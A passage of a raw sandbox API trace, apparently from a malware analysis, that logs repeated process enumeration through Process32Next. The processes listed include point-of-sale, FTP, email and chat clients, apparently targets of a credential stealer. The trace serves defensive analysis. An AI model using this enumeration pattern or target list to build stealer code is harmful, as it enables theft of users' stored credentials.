dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0276.328] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0276.330] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0276.332] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0276.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0276.336] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0276.338] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0276.391] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0276.392] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.394] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.395] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0276.397] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0276.398] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0276.400] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0276.401] CloseHandle (hObject=0x758) returned 1 [0276.401] Sleep (dwMilliseconds=0x64) [0276.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0276.556] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.557] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0276.561] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0276.563] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.565] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0276.567] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.568] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0276.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0276.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0276.572] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.574] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.575] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0276.579] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.580] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.582] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.583] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.585] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.586] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.588] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.589] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0276.641] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0276.642] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0276.644] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.645] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0276.647] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0276.648] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0276.650] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0276.651] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.656] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0276.658] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0276.659] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.660] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.662] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0276.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0276.665] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0276.666] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0276.670] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0276.672] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0276.673] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0276.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0276.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0276.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0276.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0276.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0276.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0276.720] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0276.722] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0276.723] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0276.725] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0276.726] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0276.728] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0276.729] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0276.734] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0276.736] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0276.738] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0276.740] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0276.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0276.743] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0276.746] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0276.751] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0276.753] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0276.755] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0276.757] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0276.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0276.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0276.811] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0276.813] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0276.815] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0276.816] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0276.818] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0276.820] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: 